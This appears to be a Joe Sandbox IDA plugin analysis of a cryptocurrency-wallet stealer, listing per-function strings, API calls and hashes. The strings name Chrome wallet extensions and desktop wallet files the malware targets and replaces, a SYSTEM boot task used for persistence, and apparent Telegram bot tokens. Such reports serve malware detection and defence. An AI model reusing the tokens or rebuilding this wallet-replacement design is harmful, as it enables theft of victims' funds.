7867603719:AAEHk7Xd_OIqLVzZCPZMe4dTduUoZLQ8y2Y, xrefs: 00007FF643F3BCE4
lpfcbjknijpeeillifnkikgncikgfhdo, xrefs: 00007FF643F397A4
C:\Program Files\Windows Media Player\graph, xrefs: 00007FF643F3B3C5
Extraction failed., xrefs: 00007FF643F3B3B2
1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, xrefs: 00007FF643F3B31F
user = , xrefs: 00007FF643F3A707
2CDA9B33DF3854077ED63B9E912DD676B1892A6CDD18DC59790C40799E92D71B, xrefs: 00007FF643F38AAD
, xrefs: 00007FF643F3B670
6C086D45706F3CDD6696F63808255BDDE719EA09BA60CBC98CDFEB55C8E94AE2, xrefs: 00007FF643F387D5
tabs, xrefs: 00007FF643F3854B, 00007FF643F38675, 00007FF643F3882C, 00007FF643F3894D, 00007FF643F38B04, 00007FF643F38C25, 00007FF643F38DD1, 00007FF643F38EA3, 00007FF643F39062, 00007FF643F3918C, 00007FF643F394F4, 00007FF643F39615, 00007FF643F397CC, 00007FF643F398F6, 00007FF643F39AB3, 00007FF643F39BDD, 00007FF643F39D9A, 00007FF643F39EC4
13375110344191823, xrefs: 00007FF643F398C7, 00007FF643F399D5
action.onClicked, xrefs: 00007FF643F38FB8
nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00007FF643F38804
</code>, xrefs: 00007FF643F3BA7F
Directory and its contents removed., xrefs: 00007FF643F3B2F0
ios_base::eofbit set, xrefs: 00007FF643F38348, 00007FF643F383A8
ZIP file extracted successfully to , xrefs: 00007FF643F38267
Wallets:<code>, xrefs: 00007FF643F3B9C4
egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF643F38523
Device Name: , xrefs: 00007FF643F3B7D5
C:\Program Files\Google\Chrome\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo, xrefs: 00007FF643F399FA
Directory and all contents deleted successfully: , xrefs: 00007FF643F37D7A
13375049800588985, xrefs: 00007FF643F393A6, 00007FF643F39413
13375110321620290, xrefs: 00007FF643F39E95, 00007FF643F39FA3
13375110241046665, xrefs: 00007FF643F38E88, 00007FF643F38F37
hifafgmccdpekplomjjkcfgodnhcellj, xrefs: 00007FF643F38ADC
E0DC88925F64449E216468A174ED51BFEE4E6510DF40B0D2B576B9F4DFFA468D, xrefs: 00007FF643F3949D

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_fs_code_page$ErrorLastWindow$CleanupConsoleCreateEnumFileModuleNameProcessesShowSnapshotStartupToolhelp32gethostname
String ID: terminated successfully.$128CF4C4A59C494144DAA119829B936CB9188E7B9DEFDBD4C0493780A8F822BE$13374559388926377$13374561731521706$13374995715847847$13375049800588985$13375110241046665$13375110296496201$13375110310591214$13375110321620290$13375110331747787$13375110344191823$13375110354575865$13375110364515390$18750852BBA140FCF329F0B2F98ED961304CD00CFEE1A5FF44762B97F2CE9E2F$1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$23.12.21$2CDA9B33DF3854077ED63B9E912DD676B1892A6CDD18DC59790C40799E92D71B$6442787215$6C086D45706F3CDD6696F63808255BDDE719EA09BA60CBC98CDFEB55C8E94AE2$7340678156$7427009775$7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ$7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o$7867603719:AAEHk7Xd_OIqLVzZCPZMe4dTduUoZLQ8y2Y$805CF202E4DF8532D12BE509DE6794904E1C5D1F9FD783FD1507ADE27DEEE8AA$928279468E812A7C237289C39C5EA79668D93AE33F533F0C2198516C379764B7$$</code>$<all_urls>$Device Name: $IP Address: $Location: $Wallets:<code>$AF7CBA694AB611FF172D667CA5504FEBFB024ABC1637F2C63B8D72D67BBA3F5A$All users: $C:\Program Files\Google\Chrome\Extensions$C:\Program Files\Google\Chrome\Extensions\aholpfdialjgjfhomihkjbmgjidlcdno$C:\Program Files\Google\Chrome\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa$C:\Program Files\Google\Chrome\Extensions\efbglgofoippbgcjepnhiblaibcnclgk$C:\Program Files\Google\Chrome\Extensions\egjidjbpglichdcondbcbdnbeeppgdph$C:\Program Files\Google\Chrome\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec$C:\Program Files\Google\Chrome\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad$C:\Program Files\Google\Chrome\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo$C:\Program Files\Google\Chrome\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge$C:\Program Files\Google\Chrome\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph$C:\Program Files\Windows Media Player\graph\graph.exe$C:\Users\$CAC5B4D0F32AA7D73E8AF05E83A188D2ECBA2B6186D06E54306BC2427BBCD68C$D304D4787A15629A04F596502ED8CF8C6031BF683EB7BCFDB1819D5F02C9667B$D:\@dev\Extensions\Ronin (Extension)$Directory and all contents deleted successfully: $Directory and its contents removed.$Directory don't exist $E0DC88925F64449E216468A174ED51BFEE4E6510DF40B0D2B576B9F4DFFA468D$Extensions Installed$Extraction complete.$Extraction failed.$Failed to delete the directory.$Failed to initialize Winsock.$Failed to open file: $Failed to open output ZIP file: $Failed to terminate $Graph$No wallet installed previously...$Nothing found$Process $Processing: $There are no users. Exit$ZIP Local File Header signature not found in file.$ZIP file extracted successfully to $\AppData\Local\Google\Chrome\User Data$action.onClicked$activeTab$active_permissions$aholpfdialjgjfhomihkjbmgjidlcdno$api$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$exists$fnjhmkhhmkbjkkabndcnnogagogbneec$found chrome profiles$graph.exe$hardware wallet replace finished$hash$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn$remove_all$tabs$user =
API String ID: 955434303-2808589617
Opcode ID: 0457f4509c606a9562939b026e210298e0734733717b00db84526ec2b908503b
Instruction ID: ab66f34e316949d037c044b572f71683ef4ffbc71a5993f573abd8f586cb862a
Opcode Fuzzy Hash: 0457f4509c606a9562939b026e210298e0734733717b00db84526ec2b908503b
Instruction Fuzzy Hash: A273632291CBC694EB70FF34C8562E82361FB95388F505231D65C9BEEAEF689785D340

Function 00007FF643F2CA90 Relevance: 104.7, APIs: 36, Strings: 23, Instructions: 1459COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F29B00: GetEnvironmentVariableW.KERNEL32 ref: 00007FF643F29B53
Part of subcall function 00007FF643F29B00: FindFirstFileW.KERNEL32 ref: 00007FF643F29BC8

__std_fs_code_page.LIBCPMT ref: 00007FF643F2CFC9
__std_fs_code_page.LIBCPMT ref: 00007FF643F2D303
__std_fs_code_page.LIBCPMT ref: 00007FF643F2E2DA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F2E6B6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E6CB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E6D7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E6DD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E6E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E6E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E6FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E701
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E707
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E70D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E71F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E725
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E72B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E731
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E737
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E753
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E759
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E75F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E765
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E76B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E771
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2E777

Strings

Exodus, xrefs: 00007FF643F2D748
(User: , xrefs: 00007FF643F2CE43
Atomic, xrefs: 00007FF643F2D8F9
Found directories:, xrefs: 00007FF643F2CB57
.lnk, xrefs: 00007FF643F2D94D, 00007FF643F2DC7B, 00007FF643F2DF73
remove, xrefs: 00007FF643F2E746
remove_all, xrefs: 00007FF643F2E69E
\resources\app\js\index.js, xrefs: 00007FF643F2D831
Trazor Suite.exe, xrefs: 00007FF643F2DD43
, xrefs: 00007FF643F2D58D
.zip, xrefs: 00007FF643F2D1B4
Trezor, xrefs: 00007FF643F2D7DB, 00007FF643F2DC0B
Unzipped Hardware Wallet: , xrefs: 00007FF643F2E574
Wallet: , xrefs: 00007FF643F2CC3F
(User: None), xrefs: 00007FF643F2CF37
Electrum, xrefs: 00007FF643F2D62A
C:\Users\Public\Desktop\, xrefs: 00007FF643F2D929, 00007FF643F2DC57, 00007FF643F2DF4F
\resources\app\assets\index.js, xrefs: 00007FF643F2D680
.exe, xrefs: 00007FF643F2E095
\resources\app\assets\javascript.js, xrefs: 00007FF643F2D79A
Directory: , xrefs: 00007FF643F2CC5F
#, xrefs: 00007FF643F2D791
atomic.exe, xrefs: 00007FF643F2DA15

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_taskEnvironmentFileFindFirstVariable
String ID: Directory: $ $ (User: $ (User: None)$#$.exe$.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Exodus$Found directories:$Trazor Suite.exe$Trezor$Unzipped Hardware Wallet: $Wallet: $\resources\app\assets\index.js$\resources\app\assets\javascript.js$\resources\app\js\index.js$atomic.exe$remove$remove_all
API String ID: 1414602396-4070211798
Opcode ID: 239aae4cfd6310269bdea6b6649c7b404d330e1db1773a1de50ad786597a3b39
Instruction ID: b87ea0af18bf79343ddfc1fb3080a4a4d9c23db3f0c29dea8477ebfd6d03c2c7
Opcode Fuzzy Hash: 239aae4cfd6310269bdea6b6649c7b404d330e1db1773a1de50ad786597a3b39
Instruction Fuzzy Hash: F3E2A672A1CBC281EA60BB14E1453EE6361FB95794F505331EAAC57ADADF7DE080E700

Function 00007FF643F35EC0 Relevance: 103.0, APIs: 41, Strings: 17, Instructions: 1483memorycomCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF643F35F4F
GetLastError.KERNEL32 ref: 00007FF643F35F65
GetLastError.KERNEL32 ref: 00007FF643F35FEA
CoInitializeEx.COMBASE ref: 00007FF643F36189
CoCreateInstance.COMBASE ref: 00007FF643F362C7
CoUninitialize.OLE32 ref: 00007FF643F3633B

Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A68
Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A6E

VariantInit.OLEAUT32 ref: 00007FF643F363F7
VariantInit.OLEAUT32 ref: 00007FF643F36425
VariantInit.OLEAUT32 ref: 00007FF643F36456
VariantInit.OLEAUT32 ref: 00007FF643F36484
VariantClear.OLEAUT32 ref: 00007FF643F3653D
VariantClear.OLEAUT32 ref: 00007FF643F3654C
VariantClear.OLEAUT32 ref: 00007FF643F3655B
VariantClear.OLEAUT32 ref: 00007FF643F3656A
CoUninitialize.OLE32 ref: 00007FF643F365EC
SysAllocString.OLEAUT32 ref: 00007FF643F366DD
SysFreeString.OLEAUT32 ref: 00007FF643F3672D
CoUninitialize.OLE32 ref: 00007FF643F367D1
SysAllocString.OLEAUT32 ref: 00007FF643F368C4
SysFreeString.OLEAUT32 ref: 00007FF643F3690E
CoUninitialize.OLE32 ref: 00007FF643F369E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F37950
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F37956
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3795C

Strings

Task successfully registered to run at boot with admin rights., xrefs: 00007FF643F37794
Cannot get action collection., xrefs: 00007FF643F36DA7
Failed to set executable path., xrefs: 00007FF643F37285
Failed to create task definition., xrefs: 00007FF643F36986
Cannot get trigger collection., xrefs: 00007FF643F36ACF
MyBootTask, xrefs: 00007FF643F368BD, 00007FF643F37507
Failed to register task. Error: , xrefs: 00007FF643F37666
Cannot create boot trigger., xrefs: 00007FF643F36C3F
Cannot create action., xrefs: 00007FF643F36F10
Failed to create TaskService instance., xrefs: 00007FF643F362ED
Failed to get process path. Error: , xrefs: 00007FF643F35FF2
QueryInterface call failed for IExecAction., xrefs: 00007FF643F3707D
Failed to connect to Task Scheduler., xrefs: 00007FF643F36590
Cannot get Root Folder pointer., xrefs: 00007FF643F36775
SYSTEM, xrefs: 00007FF643F37491
Current process path: , xrefs: 00007FF643F36137
Failed to initialize COM library., xrefs: 00007FF643F361AF

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Variant$ClearInitStringUninitialize$_invalid_parameter_noinfo_noreturn$AllocConcurrency::cancel_current_taskErrorFreeLast$CreateFileInitializeInstanceModuleName
String ID: Cannot create action.$Cannot create boot trigger.$Cannot get Root Folder pointer.$Cannot get action collection.$Cannot get trigger collection.$Current process path: $Failed to connect to Task Scheduler.$Failed to create TaskService instance.$Failed to create task definition.$Failed to get process path. Error: $Failed to initialize COM library.$Failed to register task. Error: $Failed to set executable path.$MyBootTask$QueryInterface call failed for IExecAction.$SYSTEM$Task successfully registered to run at boot with admin rights.
API String ID: 1778526238-4048398458
Opcode ID: a9829f7c9143c494a946ae2eece4fd15cc3df730564a76ae39a9946f5d666058
Instruction ID: b6f140c465e3c2a644eafe9ee7468e66ac8fa99b0eca5a71de87db062fd78008
Opcode Fuzzy Hash: a9829f7c9143c494a946ae2eece4fd15cc3df730564a76ae39a9946f5d666058
Instruction Fuzzy Hash: C1E28232A1CBC681EA60BB25E4457AE6361EF857A4F104331DAAD93BD9DF7CD084E701

Function 00007FF643F2E790 Relevance: 94.8, APIs: 27, Strings: 26, Instructions: 2093COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F2E910
__std_fs_code_page.LIBCPMT ref: 00007FF643F2EB1B

Part of subcall function 00007FF643F460E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F461F2
Part of subcall function 00007FF643F460E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F461F8

Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A68
Part of subcall function 00007FF643F62A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A6E

__std_fs_code_page.LIBCPMT ref: 00007FF643F2EF46

Part of subcall function 00007FF643F5E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF643F23F96), ref: 00007FF643F5E0C6

Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23B25
Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23BCA

__std_fs_code_page.LIBCPMT ref: 00007FF643F2F01E
__std_fs_code_page.LIBCPMT ref: 00007FF643F2F9F6
__std_fs_code_page.LIBCPMT ref: 00007FF643F3062E
__std_fs_code_page.LIBCPMT ref: 00007FF643F3074D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30E29
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30E2F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30E52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30E6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30ECA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30ED0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30ED6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30F37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30F3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30F43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30F49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30F6C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FA6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FD0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FD6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FDC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FE2

Strings

macs, xrefs: 00007FF643F2FE61
ios_base::badbit set, xrefs: 00007FF643F30EE0
file_size, xrefs: 00007FF643F30EA1
C:\Users\, xrefs: 00007FF643F2E812
profile, xrefs: 00007FF643F2F322, 00007FF643F2F33F, 00007FF643F2F35D, 00007FF643F2F384
\AppData\Local\Google\Chrome\User Data, xrefs: 00007FF643F2E82D
Chrome User Data directory not found., xrefs: 00007FF643F2EA1E
\Preferences, xrefs: 00007FF643F2EC5B, 00007FF643F30D21
pinned_extensions, xrefs: 00007FF643F2F718, 00007FF643F2F72F, 00007FF643F2F755
\Extensions, xrefs: 00007FF643F2EDD0
settings, xrefs: 00007FF643F2FC52, 00007FF643F2FF55
developer_mode, xrefs: 00007FF643F2F661, 00007FF643F2F697
directory_iterator::directory_iterator, xrefs: 00007FF643F30E62, 00007FF643F30F99
name, xrefs: 00007FF643F2F371, 00007FF643F2F398
\Secure Preferences, xrefs: 00007FF643F2EC62, 00007FF643F30D1A
ios_base::eofbit set, xrefs: 00007FF643F30EF2
exists, xrefs: 00007FF643F30E45, 00007FF643F30EBE, 00007FF643F30F5F, 00007FF643F30F82
ios_base::failbit set, xrefs: 00007FF643F30EEB
extensions, xrefs: 00007FF643F2F5DC, 00007FF643F2F5F9, 00007FF643F2F617, 00007FF643F2F63E, 00007FF643F2F674, 00007FF643F2F6C6, 00007FF643F2F6E3, 00007FF643F2F701, 00007FF643F2FBE1, 00007FF643F2FEDB
No extensions found in preferences., xrefs: 00007FF643F2F881
, xrefs: 00007FF643F309EE
No pinned extensions found or 'pinned_extensions' is not an array., xrefs: 00007FF643F2F863
protection, xrefs: 00007FF643F2FDEA
Warning: Pinned extension is not a string, skipping., xrefs: 00007FF643F2F826
status, xrefs: 00007FF643F30E78, 00007FF643F30FAF
File parse failed, xrefs: 00007FF643F2F2FF

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$Concurrency::cancel_current_task$__std_fs_convert_narrow_to_wide$ApisFile
String ID: $C:\Users\$Chrome User Data directory not found.$File parse failed$No extensions found in preferences.$No pinned extensions found or 'pinned_extensions' is not an array.$Warning: Pinned extension is not a string, skipping.$\AppData\Local\Google\Chrome\User Data$\Extensions$\Preferences$\Secure Preferences$developer_mode$directory_iterator::directory_iterator$exists$extensions$file_size$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$name$pinned_extensions$profile$protection$settings$status
API String ID: 1036029176-3567150991
Opcode ID: a98e0b5b1b96e2f6a73c87fbd0857c16def95f1e8b6730c45e48bbbff89afd87
Instruction ID: 374ec589fde41f8bae1f2d9413a43796fdb383a72baaf1de42f4312da8047624
Opcode Fuzzy Hash: a98e0b5b1b96e2f6a73c87fbd0857c16def95f1e8b6730c45e48bbbff89afd87
Instruction Fuzzy Hash: DC239262A1CBC282EAB4FB14E4563FA6361FB85740F405132DA8DA3ADADF7DD544DB00

Function 00007FF643F2B600 Relevance: 85.3, APIs: 30, Strings: 18, Instructions: 1276COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F2A810: __std_fs_code_page.LIBCPMT ref: 00007FF643F2A883

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C99D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9AF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9D3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9D9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2C9F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA03
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA09
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA0F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA1B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA39
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA51
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA63
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA69
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA7B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2CA81

Strings

hnfanknocfeofbddgcijnmhnfnkdnaad, xrefs: 00007FF643F2C1F4
efbglgofoippbgcjepnhiblaibcnclgk, xrefs: 00007FF643F2BA90
\assets\js\script.js, xrefs: 00007FF643F2BB44, 00007FF643F2BEF6
aholpfdialjgjfhomihkjbmgjidlcdno, xrefs: 00007FF643F2B6DE
\popup.js, xrefs: 00007FF643F2BD19, 00007FF643F2C2A8
\reset.js, xrefs: 00007FF643F2C47D
\assets\js\popup.js, xrefs: 00007FF643F2C65A, 00007FF643F2C82F
egjidjbpglichdcondbcbdnbeeppgdph, xrefs: 00007FF643F2BC65
Directories found:, xrefs: 00007FF643F2B652
\js\script.js, xrefs: 00007FF643F2B792
fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00007FF643F2BE42
\pass.js, xrefs: 00007FF643F2B967
mcohilncbfahbmgdjkbpemcciiolgcge, xrefs: 00007FF643F2C5A6
bfnaelmomeimhlpmgjnjophhpkkoljpa, xrefs: 00007FF643F2B8B3
\scripts\phrase.js, xrefs: 00007FF643F2C0CB
nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00007FF643F2C77B
lpfcbjknijpeeillifnkikgncikgfhdo, xrefs: 00007FF643F2C3C9
hifafgmccdpekplomjjkcfgodnhcellj, xrefs: 00007FF643F2C017

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
String ID: Directories found:$\assets\js\popup.js$\assets\js\script.js$\js\script.js$\pass.js$\popup.js$\reset.js$\scripts\phrase.js$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
API String ID: 4261731725-745990702
Opcode ID: 8124582dcd90375a93976c69461b9c2fc965fb62fc5fa17613937e893bc11d1b
Instruction ID: 9ba154ef18e27dca038eb7f7018a47d8f15b562d08f85aea9b539dd89f441427
Opcode Fuzzy Hash: 8124582dcd90375a93976c69461b9c2fc965fb62fc5fa17613937e893bc11d1b
Instruction Fuzzy Hash: 4DD2A062F1CB8285FB40FB65D2023EC2361AB55798F005731DE6CA76DAEF79E584A340

Function 00007FF643F26970 Relevance: 64.0, APIs: 25, Strings: 11, Instructions: 1031COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F26A07

Strings

ios_base::eofbit set, xrefs: 00007FF643F279A7
ios_base::failbit set, xrefs: 00007FF643F279A0
create_directories, xrefs: 00007FF643F2790B, 00007FF643F2793E, 00007FF643F27A20
Failed to open ZIP file: , xrefs: 00007FF643F2787D
ios_base::badbit set, xrefs: 00007FF643F27994
